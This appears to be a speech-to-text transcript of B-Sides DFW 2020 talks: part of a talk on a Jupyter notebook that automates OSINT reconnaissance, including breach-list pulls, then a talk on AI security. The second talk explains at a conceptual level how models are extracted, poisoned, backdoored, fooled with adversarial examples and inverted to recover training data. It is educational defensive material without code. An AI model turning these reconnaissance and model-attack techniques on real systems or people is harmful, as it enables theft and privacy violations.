all, and then I'll have this whole entire Excel sheet parsed in a clean and nice format for me to continue on as a base for my testing. And so let's go ahead and go back to see the OSINT itself. So you can see that it's currently running. the Shodan script, we can check back on this later to see kind of like the time and how long it took for it to take. Typically Shodan will be the longest portion, but as you can see, the rest of the tools they ran in within seconds, but because of the large number of IPs for the domain, Shodan might take a little bit more time. So what I'll do now is I'll go ahead and hand it off to Nate.

for the infrastructure piece. Okay. So as Omar was going through the demonstration there, I'm sure a lot of people were thinking, what does the underlying infrastructure look like for something like this? I was thinking the same thing as we're actually going through this and creating and experimenting with things, is what kind of horsepower do we need under the hood? What is this going to look like when we roll it out to an entire lab? So luckily, Jupyter is actually pretty lightweight, and a lot of the tools that we're using are also very lightweight. So we actually deployed this at first just on a T2 micro, moving up to a T2 medium in AWS at first.

So it's really accessible to anybody. And even in the demonstration, that Omar did, it was actually running on a local Kali instance. So we prefer to use the cloud due to some of the collaboration ability with it, but this is something that anyone could run pretty much anywhere on any flavor of OS that they want with some, as long as you're hitting those requirements for Jupyter itself. So talking about AWS, we really enjoy it because of the, you know, being able to stick something and really not just AWS, but any cloud provider, being able to stick it on a public address and then actually, you know, restricting the security group and network ACL down to

just letting certain people or certain lab IP addresses or VPN addresses to get to Jupyter itself or really just to get to anything of ours. So by restricting that, but still opening it up to everyone, I'm able to jump on from my VPN network, my portivity VPN network. Omar's able to jump on from his in a different lab. So I'm able to jump on, do something. Omar's able to jump on and actually pull down that deliverable or go check how OSINT's going on one project. It's made it really collaborative from that point. So for us, we prefer to have a new instance each time for each new engagement. So there's no kind of data contamination

crossover. If a tool breaks, we're not worrying about it. And it also kind of opens up experimentation for people of, hey, if you wanna add a new module to Jupyter, feel free to go ahead. If you break it, we'll just spin you up a new instance. And we're actually doing that through just bash scripting. That's how we actually deploy Jupyter to Kali instances, is just a bash script that goes and pulls it down, pulls our configuration file, which Omar was talking about. You can customize SSL, put a password on it, change the default port, do all kinds of cool stuff with it. So really it's accessible to anyone that wants to do automatic installs if

you want to. It's fairly simple. We're actually running it in a screen. We've had a lot of good experimentation with that and have seen it proving out. Also since our instances are disposable, we haven't had too many latency issues or issues with that.

One of the great things about Jupyter is the extensibility with it and some of the kind of crazy use cases you can use it for. And also, thing that I really love about it is with the markdown, you can actually be teaching people as they go. If it's their first time running something or the first time they're ingesting data into it, it is really impressive. There's so many different forms and tasks that you can actually integrate in with Jupyter itself. Just an example is Bloodhound. So you have all that data, but you want to actually do some cool custom queries and you're doing it the same time on each engagement, but you want to automate

it, engagement to engagement, and make sure it's consistent throughout. Instead of actually querying Neo4j or the backend database yourself, you could actually just add that as a module into Jupyter and have it do it for you and have an explanation before it and then have it run and then have a nice deliverable output that can help you with your hunting. Other things like that with offline data would be doing Active Directory reviews, doing Azure or other cloud provider reviews, or even O365 reviews where you're pulling in large amounts of data, even raw data, into a database. And as long as you have an ability to actually query it, either through bash like the command line

itself or through an interface of a database, base, you can actually automate that through Jupyter and still make it one at a time explanation and make it pretty simple and concise. Also, the reporting as Omar showed with that Excel sheet output really helps with kind of digesting and even making a formal deliverable for a client or even for yourself if you're trying to stay organized, doing bug bounty hunting and trying to keep everything sorted out. I know mine's sometimes a mess in notes. This has really helped keep it condensed and keep everything in one central spot.

So really just to sum things up, if you can script it in any programming language and you can do it in like a formatted or formatted in Markdown, Jupyter can handle it. And the beauty of that, the modularity with it and also keeping it in a simplified format, combined with its functionality of connecting it to like a Kali instance and having your custom tools on it or just pulling in new cool tools from GitHub, the possibilities are really endless on this. Awesome, thank you Nate. So before we go into some code release stuff, I think what we could do is we could go and check back on the Jupyter notebook, see how the runtime is.

I'm positive it finished probably along the same time when Nate was talking, but we didn't want to, you know, put a stall in the presentation. So just give me one second. So picking back up from where we left off, we were leaving off at Shodan. So we can see that Shodan or a script for Shodan and scraping is running to query all these IPs that we got from our reverse DNS. And it's already finished. It gives us some output saying that it's stored as Shodan. That's the name of the output file. Some vendor service enumeration was conducted using a tool called Cloud Enum. And it's given us these buckets that we saw previously in the Excel deliverable. And then a pull

for the de-hash breach list, which we also saw from the redacted information. And then again, my personal tool, GitDorker, it runs automatically inside. And you can see all the terminal output as well, showing you various links you can click on, or for probably an easier experience, you can go into Excel, everything, how you want to do it, sort it, and so on and so forth. And again, you'll get outputs on you where it's been stored. So I can go into the B-Sides demo folder and I can see all the information that's been stored individually. So if I want to go into emails, I can see emails. I have full right to edit this. If I want to add something, I can add my email in here. Right. So

it's relatively simple. I can save it. So if I out of this and go back in here, you'll now see my email. And so on and so forth for the rest of the outputs. The beauty at the end, like Nate iterated, was that there's also a parsing script that runs at the end that parses all the CSVs that were outputted into one Excel deliverable, which we demonstrated before. So it's relatively straightforward. Again, you can modify this as you'd see fit.

We'll touch on code release once that comes up. And towards the end, we'll see that the Jupyter notebook itself had an end time of 1556 or 3.56 our time. So we started at 3.45. So you had this whole Excel deliverable parsed and ready for you within 12 minutes. which I think is a great base, it's a great start, especially for somebody who has no idea what pen testing is or bug bounty hunting or wants to get a start to their OSINT. This is a perfect way for them to get started, remove those barriers to entry and have a good base to start off with in a relatively short amount of time. Remove all the wasted hours from training

and also expedite assessment time during penetration tests, especially for the corporate environment.

Now we'll go ahead and go back to the presentation itself.

Can you all see it? So talking about code release, so the release context, the Jupyter OSINT notebook is formatted like the rest of Jupyter notebooks in the .ipyynb format. So it is run within the Jupyter platform. Release date, we're planning to release within one week of the time that this presentation comes out. The release locations will be in my personal GitHub. So you can find that at github.com slash obeta12 as well. And I'll have some information coming out regarding blog posts and how to really perform Jupyter modifications or creating your own Jupyter notebooks through my Twitter, which you can see it. It's the same handle, obeta12.

And then lastly, just some follow such contact us. I already mentioned mine, but Nate, you can follow Nate at naterang at Twitter. But aside from that, that concludes our presentation. Again, super happy to be here. Really thankful to all the guys at B-Sides that made this possible, especially with the hassle with everybody being remote and the craziness that is COVID. So shout out to those guys. And now we'll be taking any questions if anybody has some.

Hi everybody, I'm Pesto. Thanks so much for coming to my talk on AI security here at B-Sides DFW 2020. It's my second year in a row doing B-Sides DFW. I'm super excited to be here. I'm so excited to talk to you about AI security, some of the projects I've been working on, some of the things I've learned over the last year. Let's start out real quickly going over kind of what the presentation is going to look like from here. I'll introduce myself. and talk a little bit about AI, a little bit about a 10,000 foot view of AI security before we talk about some of the specific threats and attacks that we deal with in

AI security. Some further considerations, those are really important, really interesting. And finally, we'll go over a little bit about how we might mitigate some of these attacks. Hopefully we'll do a good Q&A afterwards too. So just to start out, been doing this for about 20 years. I met up with a fun group back in the early 2000s, late 90s, early 2000s, named Ninja Networks. I've been hanging out with them for a long time. We used to do a lot of fun things at DEF CON. Mostly them. I was kind of the distant Texas contingent of Ninja Networks. But nonetheless, we did a lot of fun things at DEF CON, and I've sprinkled some pictures of the shenanigans at DEF CON over the years from Ninja

Networks that I think are fun. So I hope you enjoy those. But apart from that, I've actually been a professional since 2000. Started out doing things like firewalls and IDS, you know. But since then I moved on to doing some more like pen test and incident response stuff, a little bit of forensics works. But for the last 10 years, I dealt mainly with insider threat, with corporate insider threat, and I became somewhat of a specialist in that field. But for the last year, I started a new job doing AI security. And this is what I'm here to talk to you about today and go over some of the cool stuff that I've learned. And it's important to kind of think that or to understand my background,

that I don't come from a data science background. I don't come from a mathematics background. I come from a hacker background and an information security background. So I'm approaching AI security from that angle, whereas a lot of the researchers who are into AI security have a more formal education background or more background in science and data science. Before we go any further, I want to make it clear that even though I do this for a living and even though I went to school for this, none of the information I'm presenting here is representative of my company or of my school. These are all... of my own research over the last year into AI security and shouldn't be considered official statements from any particular

organization. So with that in mind and that out of the way, let's talk a little bit about AI. And first thing I want to do is differentiate the term AI from some of the other terms, right? I'm going to use the term AI because it's easy and people recognize it, but it's really not the most precise term AI has been around for a long time and it encompasses a lot of different technologies, a lot of different concepts. More specifically, I'm mainly talking about neural networks. And neural networks are a way to enable, they're one technique that enables machine learning. And machine learning is one type of AI. So that's the relationship between neural networks, machine learning, and AI. Again, forgive me, I choose to use the term

AI. 99 times out of 100 in this talk, you can substitute the word neural networks for AI and you'll be right. We should also talk a little bit about machine learning. Mainly falls into two categories. And the first category is where I have a bunch of data and I don't really know how to organize this data. I don't really know what groups exist within this data and I need a way to kind of sort them out, separate them out and cluster them together. So I have models that allow me to do that. by looking at the data without any other information. So this is a priori, just looking at the data, what do I see inherent in the data that I can make divisions or separations on, and that's

called unsupervised learning. We're mainly not talking about unsupervised learning in this talk. What we're mainly talking about is supervised learning. And what that means is that I provided on top of the data, I provided labels to that data. So the example I'm going to use throughout this talk is an AI model that identifies hot dogs in pictures. You send it a picture, it tells you if there's a hot dog in there. The way we would do this theoretically is we would have this huge selection of hot dog pictures from all different angles, right? All different types of hot dogs. all labeled hot dogs so the AI knows what they are. The AI learns what a

hot dog looks like from all of those pictures and that's called the training data or the training set, right? And once it's trained based on that training set, it can kind of generalize the abstract concept of a hot dog. meaning that when you send it new pictures of hot dogs that it's never seen before, it still knows it's a hot dog because it's so clever because we've trained it so well off of our training set. It's important that we kind of have a basic understanding of what training data is because it factors in a lot into AI security.

that out of the way, I want to kick things off by showing an example of why AI security deserves special consideration. And it's one of the key takeaways from this talk. One of the things I really want to impress is that we may think that because AI is just a program, it doesn't really need any special treatment. It's an application, right? And we already have tons of

security practices around how to secure applications, right? All up and down the stack. But one of the things I'd like for you to take away, if I do a good job explaining this to you, is the idea that that just doesn't work for AI. There's special considerations when we talk about this kind of AI, especially these neural networks. And why there are special considerations. So in this picture, in this GIF, we see researchers shining white lights with a commodity onto the road and the car thinks that it's actual lane and the car swerves. And we can understand why this would be very dangerous if this were to be done, you know, outside of controlled research. Now, this isn't especially technical or sophisticated. For

a sleepy driver may actually make the same mistake, right? But one of the things we can't really get into is the philosophical difference between an AI making mistake and a human making mistake. But there is a big difference. But what I wanted to focus on was thinking about the information security principles that we all know. How would any of them stop this attack? Right. There are some things that are kind of universal, but there's The point I want to make is like there's no firewalls or lockdowns or, you know, encryption that's going to fix the guy on the side of the road with the projector. Some of you might have seen the guy who caused a traffic jam on Google Maps by having a radio flyer

wagon full of cell phones with the location turned on. Call this the radio flyer attack. It's this kind of attack. This is one kind of attack, I should say, that we have to take into consideration when we're deploying AI into the wild.

bring to your attention this uh graph on the right this is made by a man named nicholas carlini who's a bit of a rock star in ai security um he uh helped found an attack called the carlini wagner attacks named after him and um the co-author he's done tons of talks writes tons of papers he's a very accomplished researcher and developer he keeps track all the papers, the research papers that are released on a specific type of AI security flaw, attack called adversarial examples or adversarial perturbations. And we're going to talk about those later on today. But they're just one type of attack. And you can see here just in the last year, we're talking about people are releasing more

than one paper a day. It's blowing up. And I personally haven't seen anything so Wild Wild West since the late 90s or early 2000s, since the internet boom. Back then, you couldn't get a degree in information security. I don't know if there were any real certifications back when I started. There's very little way to find good guidance on how to secure networks. It's very similar in the AI space today because these attacks are specific to AI because they're not... by traditional information security practices, it's a bit of the wild, wild west, and there's not any real authority we can look to for guidance on how to securely deploy AI. And that's the second takeaway I want you to have from this talk is

that this is important, and right now it's really open, and there's not a lot of guidance there. We'll talk about the third takeaway a little bit later, but if we at least remember the first two, that information security practices aren't going to cover it for AI and that there's no established guidance, then I think we've done pretty well already. I'll see if I can convince you of some of this as we go on. Let's talk about why AI is at risk. This may be apparent to some of you. It may not be. A lot of us just like to hack things because we think it's fun, even though it may not benefit us in one way or another other than bathing in the sweet

glory of the attack. But this is a real deal. If you have, for example, an AI that predicts whether or not an applicant will pay back a loan, and based on that decision, your financial institution chooses to give this person money or not. If I was somebody with not very good credit, might benefit me to get an answer out of that AI, to persuade that AI, to trick that AI into making a decision it wouldn't normally make. Another attack is not about getting a favorable decision, but about stealing the model itself. This may be IP, it may be a competitive advantage, whatever. Stealing the model itself is also another attack. And finally, the information that was used to train the model. going to talk a

little bit about how that's at risk. What's important, I guess, at this point to say is that none of the attacks, almost none of the attacks, we're going to talk about require privilege escalation. These aren't hacks in that sense of,

you know, gaining authorization where you didn't have it and or exploiting

in order to penetrate a defense or access a server or access a resource. We're not going to do any of that stuff. We're simply going to use the AI in a way that it wasn't intended to be used. It's pretty fun. But I wanted to make that clear that none of this involves very little of it, requires privilege escalation. There are a couple of times that we think about what could happen if somebody didn't have access, but I try to stay away from that stuff. is the CIA triad. You may recognize this. If you don't, don't worry. This is a way that a lot of information security is taught that if we consider the confidentiality, integrity, and availability of our data, then we're doing a good job

of securing that data. We're improving our security posture the more that we can assure the confidentiality, integrity, and availability of our data. What I'm going to do I'm going to talk a little bit about how these differ when we talk about AI from what they mean when we talk about information security. I'm also going to show you how this falls short and what needs to be added to this to cover AI. And I'm going to start out by fudging a little bit and say availability is pretty much availability. I don't know of any real special... specific attacks on availability. I mean, it's either available or not. Yeah, you can ask it so many questions, I can't answer any others. But just know it's better that your model is

available than if it's not available. But barring availability, we're going to talk about AI specific threats, how they fit into the CIA triad, and how they don't fit into the CIA triad. Start out with confidentiality. In traditional information security, right, confidentiality is about, you know, data that shouldn't be seen by people unseen, right? When we think about confidentiality, we think about like authorization, you know, encryption, right? Perimeter defenses. A lot is covered under confidentiality. It's about keeping private data private, right? Same thing in AI, but specifically, right? When we talk about, when I talk about confidentiality in AI, what I'm talking about is an attack called model extraction. I'm talking about keeping the model private. AI is almost, as far as I

know, like unprecedented in that how much information is available on AI. If you wanted to go like build in a very powerful nuclear submarine, you may be able to find plans on the internet, download them and build it. And it may work. I don't think so. I wouldn't do it. be able to, but you can do that with AI. And AI is very, very powerful. Granted, maybe not as powerful as a nuclear submarine, but you never know when you're dealing with AI, right? And it's all out there and it's relatively easy. I won't say it's simple, but it's relatively easy to get started in and to start building your own models. Tons of free classes out there, tons of YouTube videos. It's wide open. And AI has a...

networks especially have a feature known as transferability. And what transferability means is that an AI that's good at doing one thing is probably good at doing that thing, right, across the board, no matter what the inputs are. Let me explain it a little bit better. If I had, you know, my hot dog identifier, and you could throw any hot dog at this AI, and you're not going to get a hot dog past this. This model is just the best dog identifier in the universe, right? Chances are, if it's good at identifying hot dogs, it's probably also good at identifying enemy warcraft, warcraft, enemy aircraft, right? Or political dissidents, right? Or things that were weren't necessarily thinking of when we designed this model, used in ways that we didn't want

it to be used or may not have known it could be used for. This makes models particularly attractive to theft, right? If you have a model that's really good and I want that model, then perhaps I might try to steal that from you. And the way, one of the ways we could do that is, yeah, to the server that it's on onto the back of the truck or we could you know get a shell and and SCP it out or or whatever but um but what I'm going to talk about is something called model extraction and in this attack what we're doing is we're basically asking your AI a lot of questions and learning are actually getting your AI to

train my AI so if I wanted a hot dog identifier I might build a rudimentary model that basically just learns, right, from another model, from your model. And I send your model, hey, is this a hot dog? And your model says, yes, that's a hot dog. Well, now my AI knows it's a hot dog, right? And if you say, no, it's not, well, I know that that picture is a little bit different and that's not a hot dog. And I can build this very similar set and I can optimize, right, my AI to match your answers. And once I've done that, once your AI has trained my AI, we have an AI that is almost

indistinguishable. I've basically copied your model. I've extracted your model. And then I can do a lot of things with it. For example, I can transfer it to identify other things, perhaps Warcraft, whatever that is, right? I guess the box DVD sets, I don't know. Enemy aircraft or whatever else I want. So that's transferability, right? That's model extraction. And there's one more concept I want to talk about. And that's the concept of a surrogate model. There's one more use for this. If I extract your model, I now have this surrogate copy. And what I can do is I can hammer at that with a bunch of different attacks, trying to see what works. And once I've got... attack down then i can launch it against

your ai with a very fairly fairly confident that it will work because it worked against the surrogate does that make sense so it's kind of like having your own lab copy to hammer out on so the surrogate model model extraction model transferability oh yes and machine learning as a service let's say your business is providing learning services for example other people might want their pictures their hot dogs identified in pictures so they might you know pay you a nickel each time they send you a query asking you if this if there's a hot dog in this picture right so what might happen is each time they're asking you is they're training another model until they don't need

your model anymore because they've got a surrogate model and they don't need your service anymore If you're offering machine learning as a service as something to be aware of,

your particular is susceptible to this kind of attack or at least this kind of attack would affect you perhaps more than it would affect other people.

So we talked about model extraction and surrogate models and a bunch of cool stuff. I'm going to talk about integrity now. We think of data integrity or file integrity, we're talking about making sure that we can trust the data that it hasn't been fiddled with, that we can trust where it's coming from, things like that. Technologies that come into mind are things like hashing, you know, checksums, things of that nature, certificates. But with AI, I'm going to talk a little bit about poisoning. And data poisoning is a, I think, a fairly intuitive concept. If I am depending on this training set, I'm depending that all of these things are labeled correctly. I'm depending on that fact, I should say. Well, if you're able

to put in a bunch of pictures of hamburgers labeled hot dogs, and my model learns that hamburgers look like hot dogs, and it starts incorrectly identifying hot dogs where there are none. If I'm able to put in those pictures of the hamburgers, then I've poisoned your model. Now, what way to do that is to, yes, either access the database without authorization or whatever, or the data warehouse, wherever these pictures are, and just put them there. But I'm not really going to talk about that too much because I think traditional information security practices would kind of apply there. What I am going to talk about is the fact that we... often don't have control of the training data. We often put that control initially in

the hands of end users or even the public at large, right?

You may think, for example, a good example is spam filters. So let's say you have a button that says report spam. And imagine that when you click, you see spam in your inbox and you click report spam. I want you to imagine that that is sent to an AI. What you send to the AI is the content that says, you know, the piece of spam and the label, this is spam. Well, then you have, you can build a training set and then your model can learn what spam looks like. And when we roll out that model, it'll start denying those kinds of emails. So what will happen, of course, is that the spammers will change

how the spam looks a little bit until it bypasses the filter and you click, this is spam again. And then your model is updated. In this case, we've ceded control of our training set into the users. And enough malicious users, or enough malicious use, or the right malicious use, could enable a spammer to bypass the spam filter basically by mislabeling data. Or they're a little bit more sophisticated than that. and then include those phrases in the pieces of email. But you can think of it just simply as the model says, okay, there's a line and all the spam is over here, right? And all the ham, all the good email is over here. And what we wanna do is we wanna take email from this side and we

want to put it on that side and that'll allow us right to send that email and what we need to do is we just need to move that line just a little bit and that's called model drift right and that's a an indicator of model poisoning of doing exactly what we just talked about measure this one way a good way to mitigate this is to have a known input and known output of your model and make sure it's consistent or if it's not that you understand why or whatever because if it's not if you're starting to suddenly get different answers it may be an indication of model drift and model drift can happen in the normal course of business but could also be a an indicator of compromise

backdoors there's a the terminology is not necessarily

to what it would be in InfoSec. Not everybody uses the term backdoors, but there are papers that use the term. What they mean when they say backdoor is basically poisoning the data and hiding, not really hiding the fact, but not exploiting the fact until later. That's all it means. So for example, if we had right turn signs and we were teaching cars to learn what a right turn sign is by noticing a car turning right and then noticing all the signs that are around it and finding the common right turn sign. Well, let's say someone started putting markings on those right turn signs and your AI learns that those markings are part of what a right turn sign looks like and you deploy this model,

you know, in all of your wonderful cars, no one's going to notice anything wrong. doesn't have to have those markings. It can see the rest of the sign and say it's still a right turn sign. But if it does see those markings on something like a stop sign, if I then go mark, put those markings on stop signs and it's able to fool your AI, then I've triggered that backdoor. So it's still, it's still, you know, model poisoning. It's still, in this case, data poisoning, but it's not really evident and it's not really triggered till later and we, it's called a backdoor. So again, no privilege escalation is required to do this in many, many cases, especially with dealing with model drift. And

it's surprising that the spam filter was one example, but it's surprising how often, because it takes so much data to train AI, that that data is sourced from places where it was out of our control. Talked about C, talked about the I, glossed over the A. Now we're going to talk about the RP. And I would like to introduce you to the CIARP Pentad. It's a very catchy name. This is not a thing. I just made this up. But if you want to make it a thing, I'm cool with that. You can just go around talking about the CIARP Pentad as if everybody should know what it is. I think that you should. Absolutely. But anyway,

I've added privacy and robustness. Privacy? We all know what it is. We all know how important it is. We all know that nobody cares about it, but they should. But again, I'm going to differentiate why privacy is a little bit different when we talk about AI. But I'm going to spend the most time talking about robustness and adversarial perturbation. This is what Nicholas Carlini was graphing earlier. And this is really kind of the meat and potatoes of AI security. This is what all the hubbub is. This is where a lot of the research is. So let's get into it, right? Model robustness is the ability or the degree to which your model withstands attacks from adversarial perturbations.

So I'm going to talk about this attack that we see on the right-hand side. This gentleman in the top left picture, right? Using a state-of-the-art at the time, facial recognition AI was correctly identified as himself. When he put on the funny glasses, he was identified as Mila Jovovich. of the interesting things about this attack is that this is called a targeted attack and there's a couple of different use cases we can think of the first one is in a future far future dystopian place where where this would never surely happen in real life but imagine if you could um facial recognition technology at airports that looked at your face and compared it to a the faces of known

wanted people um And if there was a match, then you weren't able to board the plane and the marshals came and got you and made your day very bad. In that case, a bad actor wouldn't really care who the AI thought he was as long as the AI didn't think it was him or her or perhaps another bad actor. But the point is that it doesn't have to target any specific person. It can just be anyone but me. And that's called an untargeted attack. But this is actually a targeted attack. Those are Mila Jovovich's When he puts them on, always Mila Jovovich. Not random. A specific pattern on those glasses. And those are just an inkjet printer cut out and glued on to drugstore glasses. Not very high

tech, right? Convinces the AI that it's Mila Jovovich. On the right-hand side, we see a stop sign with some stickers on it that makes the model think it's a speed limit of 45. And I don't want to confuse anybody. This is not model poisoning. Not like the stop signs we talked about. like a slide or two ago is completely different. We did not poison the model here. This is just the way that this computer vision AI worked. The way it makes its decisions about the difference between a stop sign and a speed limit sign are subtle, more subtle than we may think. And they can be tricked by putting just a few stickers, by making small alterations to it. This is

just the way these neural networks work. we exploit this? Should we just put a bunch of stickers on or do different colors and see what happens? You can. Let me know how it works. Or we can use a lot of the available toolkits that are out there to help us by people who have already discovered these attacks. Bully finding new attacks yourself, that is super cool. But to get started, if you're new to this, we're going to talk about a couple of tools that we can use later on. But I want to talk a little bit more about little bit more in depth about an adversarial perturbation because this is often what it looks like right here. Now these are read left to right, not up and

down. So in the top left we have the Alps, which it kills me that whatever AI this was in this research paper from this picture could not only correctly identify the white bit as a mountain, but as the Alps mountain chain is unbelievable, especially with that degree of certainty. Plus this adversarial perturbation that we generate as a bad actor, as an attacker, as a security tester, right? We overlay one onto the other and we get the input on the right. Now that is called an adversarial example, the image on the right. The ones, and we create that by adding the adversarial perturbations and we get this kind of snowy figure to the right. In the

lower right on the puffer that's now a crab, it's hardly noticeable. One of the things I've started to notice is Google Captcha looks like this sometimes now. And I don't know if they're training their models to ignore adversarial perturbations or not, but I can imagine if like you say, click all the buses and you've done adversarial perturbation to these pictures, right? They can learn what a picture of a bus with an adversarial perturbation applied looks like, and they can label it that. So if they ever see a bus, With that adversarial perturbation, they know not to trust the classification from it. They may be training, I don't know if they are, but it occurs to me when I saw that, that perhaps they're training

their model to see adversarial perturbations, which is a way to actually increase your robustness. It's not a great way because unfortunately, workaround is you just add another adversarial perturbation onto that and it does the exact same thing and then you get into this like how many layers deep are we going to go um depending on your use case it may be feasible it may not be um i love this dog 99.99 i wish i could get an ai to be that certain i mean if i if i saw that i would think my models overfit i don't even know if i would trust it but anyway a hundred percent that is a grab um a little bit odd but anyway the the

the technology they're talking about is sound, the adversarial perturbations do work. And because they just operate on the way computer vision models work, they're very hard indeed to mitigate. The best thing to do is just to test this yourself so you know your risk before you deploy. And we will talk about how later. But first, I want to talk just a little bit about data privacy, not data privacy, model privacy. So this is weird. If I told you, hey, your model may be leaking training information, you may not think that that's that strange. But if you know a lot about AI, you might look at me like I was an idiot because the training data is not located anywhere in the

AI. You can delete the training data accurately. the model is trained you don't need it anymore so it's not like the model is like checking to make sure or talking to the training data it's not if you were to run a debugger on the model you wouldn't see any information from the training data there all you would see are the weights it it put to each neuron to each decision kind of it made it's a it's a coefficient number it's not representative of the data it's of the decision so or of the feature

the training data isn't located anywhere in there, nonetheless, there are certain circumstances in which your model may leak training data. I'm not going to lie. This is not that common. This is kind of a fringe example, but it is important to know that these things exist because you never know when the next, you know, big, it might blow up, right? This isn't that common and it requires a very precise kind of set of requirements. And one of them is returning a confidence score. when it said crab 100% or out 94% that's a confidence score and if you return that to the user when the user asks you to classify something it can be kind of used against you so the upshot is if you don't have to return

a confidence score don't because this can happen basically you send it a if you have this guy's name I'm gonna call him Kyle Kyle here on the right um if you have his name right um and you have a model

that returns, when you give it a picture, returns a name and a confidence score. Like it's 50% sure that this is Bob and 20% sure that this is Sue or whatever. I can basically just send it random stuff until it thinks it's like 0.001% John. And then I can take that and start building off of it. Right. And, and taking that small percentage and optimizing for a larger percentage until I come close to the original picture. Right. Um, So I add a squiggle here, a squiggle there, and now I'm at 2%. Oh, great. Right. So I keep those and I keep adding on to those using a specific technique. And we come up with the

kind of general idea of the pictures in the left and right, kind of scary images. But this is known as model inversion. And it's especially disturbing when it's... with a concept called membership inference and membership inference I would imagine is kind of big in the OSINT world but what it means is that if you take one set of data like the training set and you combine it with another set of data right it becomes you know quite powerful you need that much information to positively identify someone. If we look at the example on the right from this white paper we can see that a publicly available voter registration list that's available for purchase contained all this information including zip, birth, the date, and sex. And if we match

that zip, birth, date, and sex against medical data we can we can kind of glean the name and address of the people in the data because not that many people share the zip birth date and sex. You wouldn't think it'd be that precise but the confidence scores are actually, you can't be 100% sure, but the confidence scores are rather high in this example. So that's membership in France and when it's teamed with model inversion it can mean some pretty nasty stuff. This is still a little bit fringe and it does require a very specific set of, you know, set up in the environment. Hopefully that was super helpful or interesting at least. Maybe I think it's kind of exciting personally. And I put further

considerations at the end and I didn't talk a lot about it. Not because they're not important, but because I didn't want to scare anybody away from the third takeaway, which is things that we don't normally talk about when we talk about information security in the... of AI, we should. I'm going to make the argument that explainability, ethics, and fairness should be the job of the information security professional, of the people who are doing AI security. The biggest reason for that is nobody else is right now. And that doesn't mean that people don't care. Tons of people out there are doing great work on this, tons of great research, not... of them from an information security

background. It's more like if you were to go to someone in your company and say, hey, who's responsible for making sure that we're only releasing ethical AI? Who talks to the vendors of the applications that we're using that use AI? Who's making sure that those vendors are enforcing fairness and ethics standards? And if you do that, I would love for you to email me what their answer is, because so new, not a lot of people are paying attention to this, and it's a big deal. It doesn't matter how secure your AI is, how well you're protected against adversarial perturbations and model inversion. If your AI is out there doing things an AI shouldn't be doing in

the first place, right? Or if your AI is making unfair decisions, talk real quick about explainability. Explainability is a bit of a contentious issue. What it means is that if your AI makes a terrible decision that puts you in the news and somebody comes to you and says, how did this happen? Why did your AI choose this? If your answer is something like, I don't know, or nobody knows, or because stats or probabilities, it's not really a great answer.

explainability is about understanding the features, what features went into the model, and how your model used those features to reach a decision. It sounds pretty straightforward, but it's kind of contentious because people don't, not everybody, and I'm actually one of them, not everybody likes the idea of calling it explainability because it doesn't really explain much. If I tell you Well, it thought this was a hot dog because it's kind of red like a hot dog. And it's kind of long like a hot dog. And I know because I've researched this and I know AI explainability is very important to me. So I know that these are the two biggest features that my AI uses in order to make a determination about whether or

not it's a hot dog. Honestly, it doesn't really explain much. Well, what is long? is, I mean, how red does red need to be, right? And the more you dig in, the more and more vague your answers get, because the answer is like stochastic gradient descent and hard things, right? Things that we don't always necessarily understand 100%. And calling that explained is misleading. But my stance is that explanation you can give that reaches you closer than nothing that is more accurate than nothing is better than nothing right

my stance is that you should be able to do some elementary analysis and understand you should know what your features are in the model and you should understand how they how the model uses them one of the tools you can use for this is lime analysis lime analysis does just that it tells you what features played into each decision another problem with explainability here AI explainability is very important to me so I've done this complete lime analysis it should answer all your questions okay well how does the lime analysis work well you get to the exact same problems how does the lime analysis know that this is you get into the exact same problem so explainability a bit contentious but something's better

than nothing ethics and fairness a couple of different flavors of this, right? The biggest ethical issue is should AI be making this decision at all or should a human being? Is there a human in the loop, so to speak? Or does the AI make decisions by itself? And if so, is that okay?

Like I said at the beginning, there's a difference between AI making a mistake and a person making a mistake. If a person makes a mistake, you can say, Bob, you made a mistake and we're going to make sure that you don't make this mistake again one way or the other. AI makes a mistake. Who's responsible for it? You don't always have attribution to AI. And sure, people will get out of blame, but we all still kind of know, right? With AI, it adds a layer of abstraction that's sometimes very difficult, especially if like, oh, we didn't even make this AI. We bought this AI from AIRS, you know? It can get pretty difficult. And if you're using AI to do something that affects

people's lives, don't understand how that AI works, you're putting yourself in a very precarious position. And we've seen this before. Unfortunately, this has really affected people's lives before. There is one example you can look up about an AI that was used in the criminal justice system. It was used to basically

rate recidivism, to be able to say it, but the odds that someone would commit a crime again, were they released on parole? So this AI was making suggestions, recommendations about who got parole and who didn't. And it was a pretty racist AI, unfortunately. And the AI learned from actual, you know, parole cases, right? The unfortunate part about that is, is inherent bias in law enforcement and in the justice system, I should say, excuse me. And racism in the justice system was used to train this AI and you got a racist AI out of it. Yeah, it's bad for people to make decisions based on this. But I maintain that it's even worse if AI does,

especially if people, you know, don't understand that that's how it works. We need to be very careful about whether AI should be making these kinds of decisions at all. We need to understand what happens if this doesn't work the same for everybody, right? What if only a certain population is able to receive the benefits from this AI because of the way they look or because of some other, you know, protected feature or things like that? Really, that is the most important part. And that's the third takeaway is that Information security professionals, this should be in our domain and under our program. Almost last, how do we actually go about fixing this? This is really going to be the

subject of my next talk, so I'm not going to give it all away here, but I do want to give a little teaser that it begins with a comprehensive risk assessment. It involves really understanding those features and how they're used in AI. It involves understanding the models that are being used and how they're being used. Once we've done a lot of that research, we then start actually testing robustness, inversion, all these things we've talked about, and understanding what our risk is. And then we continue to monitor as it's in production, as it does its inference to see if it's behaving correctly. That is pretty much all I've got. I've had so much fun talking with you about all this fun stuff.

Before I go, this is my email address. Reach out to me if you're curious about this, if you're a professional doing this. If I've made a mistake, hit me up in the Q&A or hit me up on my email and give me both barrels. Archive.org is where a lot of these papers are released, where you can get the primary documents, the actual source documents and not some article about the documents, the actual white papers are. The IBM Art Toolkit, Adversarial Robustness Toolkit, is a very simple toolkit. It's a library. You use Python, which is what a lot of people code in to do AI. And basically, you just tell it what attacks you want to run against a model,

and it goes to town. It's very cool. I've used it and recommend it. It's the IBM Art Toolkit. The IBM Art developers have a Slack that you can join and ask them questions. Another one that was recently introduced to me is Privacy Raven. And that uses PyTorch, which is a little bit of a higher level layer of abstraction. So it makes doing AI a little bit easier, one might say. know the author of Privacy Raven is looking for feedback on how it can be what else it can do and how it can be improved and how people are using it so definitely give that a try there's tons of other ones Foolbox is out there CleverHans but I wanted to bring these two to your attention

